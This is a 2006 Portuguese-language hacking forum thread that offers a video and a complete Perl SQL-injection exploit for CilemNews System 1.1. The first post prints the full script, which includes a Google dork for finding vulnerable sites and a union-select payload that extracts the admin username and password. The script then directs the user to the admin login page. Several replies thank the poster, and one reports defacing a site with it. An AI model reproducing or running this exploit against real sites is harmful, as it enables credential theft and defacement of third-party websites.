Video para fazer a primera deface

Anonymous · 20 de May , 2006, 05:17:00 PM

Baixe o video Clicando Aqui

Agora postarei o codigo do exploit utilizado, caso use windows tenha o active perl que pode ser encontrado no www.superdownloads.com.br

Code Select

#!/usr/bin/perl
#Method found & Exploit scripted by nukedx
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
#Usage: cilem.pl <victim> <directory>
#Original Advisory: http://www.nukedx.com/?viewdoc=10
#googledork [ inurl:yazdir.asp?haber_id= ] 2.140 pages...
use IO::Socket;
if(@ARGV < 2){
print "
+***********************************************************************+
+Welcome to CilemNews System <= 1.1 (yazdir.asp haber_id) SQL-inject xpl+
+                   Usage: cilem.pl <victim> <directory>                +
+                       Example: cilem.pl sux.com /                     +
+                 googledork [ inurl:yazdir.asp?haber_id= ]             +
+                 Method found & Exploit scripted by nukedx             +
+***********************************************************************+
";
exit();
}
#Local variables
$cilemserver = $ARGV[0];
$cilemserver =~ s/(http:\/\/)//eg;
$cilemhost = "http://".$cilemserver;
$port = "80";
$cilemdir = $ARGV[1];
$cilemtar = "yazdir.asp?haber_id=";
$cilemfinal = "admin/giris.asp";
$cilemxp = "1%20union%20select%200,admin,sifre,0,0,0,0,0,0,0,0,0,0,0%20from%20ayarlar%20where%20admin=admin";
$cilemreq = $cilemhost.$cilemdir.$cilemtar.$cilemxp;
#Writing data to socket
print "+**********************************************************************+\n";
print "+ Trying to connect: $cilemserver\n";
$cilem = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$cilemserver", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $cilem "GET $cilemreq\n";
print $cilem "Host: $cilemserver\n";
print $cilem "Accept: */*\n";
print $cilem "Connection: close\n\n";
print "+ Connected!...\n";
while($answer = <$cilem>) {
if ($answer =~ /font-weight:700\">(.*?)<\/b><\/td>/){
print "+ Exploit succeed! Getting admin's information.\n";
print "+ ---------------- +\n";
print "+ USERNAME: $1\n";
}
if ($answer =~ /(.*?)<\/font><\/td>/) {
print "+ PASSWORD: $1\n";
print "+ ---------------- +\n";
print "+ Lets go $cilemhost$cilemdir$cilemfinal and\n+ Login with this information. \n";
print "+**********************************************************************+\n";
exit();
}
if ($answer =~ /Internal Server Error/) {
print "+ This version of CilemNews is vulnerable too but default query of SQL-inject doesnt work on it\n";
print "+ So please edit query by manually adding or removing null datas..\n";
print "+**********************************************************************+\n";
exit();
}
if ($answer =~ /number of columns/) {
print "+ This version of CilemNews is vulnerable too but default query of SQL-inject doesnt work on it\n";
print "+ So please edit query by manually adding or removing null datas..\n";
print "+**********************************************************************+\n";
exit();
}
}
print "+ Exploit failed :(\n";
print "+**********************************************************************+\n";

Autor do Video: h4xOr

100 +

Anonymous · 20 de May , 2006, 05:35:27 PM

Estou baixando o arquivo de de 13,3 MB para quem tem net discada vai demorar em torno de 45 minutos.

Pela descrição deve ser uma boa video aula, baixem enquanto e tempo antes que o Rapidshare apague o arquivo.

Anonymous · 23 de May , 2006, 08:21:22 PM

Ótima aula
Mto boua msm
vlw ae cara
abraçao!

spiriti · 23 de May , 2006, 09:08:19 PM

Vou conferir o video,e,parabens pela iniciativa de contribuir com conhecimento e
compartilha-lo!

Sladrak · 24 de May , 2006, 05:40:53 PM

Hmm...

Nao consegui fazer nao xD...

Nao axei nenhum site que desse certo...

Mas msm assim vlw pela postagem..

Emilly Rose · 24 de May , 2006, 08:25:03 PM

Vou dar uma olhada no video e estudar esse exploit!

//Emily

Anonymous · 24 de May , 2006, 08:57:37 PM

muito bom =D fiz em 1 site so q fizeram por cima do meu -.-'

bloodrain · 24 de May , 2006, 09:08:55 PM

pqp man vc sabe da vul e nao conserta no seu?

Anonymous · 24 de May , 2006, 09:57:56 PM

ae

amanha sem falta vou da uma olhada nessa parada de deface

parece ser muito maneiro ^^

vlw pelo post amigo

Anonymous · 25 de May , 2006, 03:29:16 PM

Uppa de novo ae velho...ta dando erro aki.

Anonymous · 25 de May , 2006, 03:31:52 PM

Qual o erro ?

Quote from: "SnOOp"Uppa de novo ae velho...ta dando erro aki.

100+

Anonymous · 25 de May , 2006, 04:08:12 PM

Ah esse eu não perco,valeu!

Anonymous · 25 de May , 2006, 08:41:39 PM

Muito Interessante
So Gostaria de Saber se o cara usou algum tipo de proxy
Porque logar como root fica logado naum?
Se eu estiver errado me corrigam
Sem mais
Muito Maneiro Mesmo
Vlw Irmão!

Anonymous · 25 de May , 2006, 08:46:47 PM

Não entendi sua pergunta $:-\$

Quer saber se foi utilizado algum proxy ?

Quote from: "Rhavynho Player"Muito Interessante
So Gostaria de Saber se o cara usou algum tipo de proxy
Porque logar como root fica logado naum?
Se eu estiver errado me corrigam
Sem mais
Muito Maneiro Mesmo
Vlw Irmão!

100+

Anonymous · 26 de May , 2006, 05:20:17 PM

Ué não aparece os segundos pra baixar.

FORUM DARKERS

Video para fazer a primera deface

Anonymous

Anonymous

Anonymous

spiriti

Sladrak

Emilly Rose

Anonymous

bloodrain

Anonymous

Anonymous

Anonymous

Anonymous

Anonymous

Anonymous

Anonymous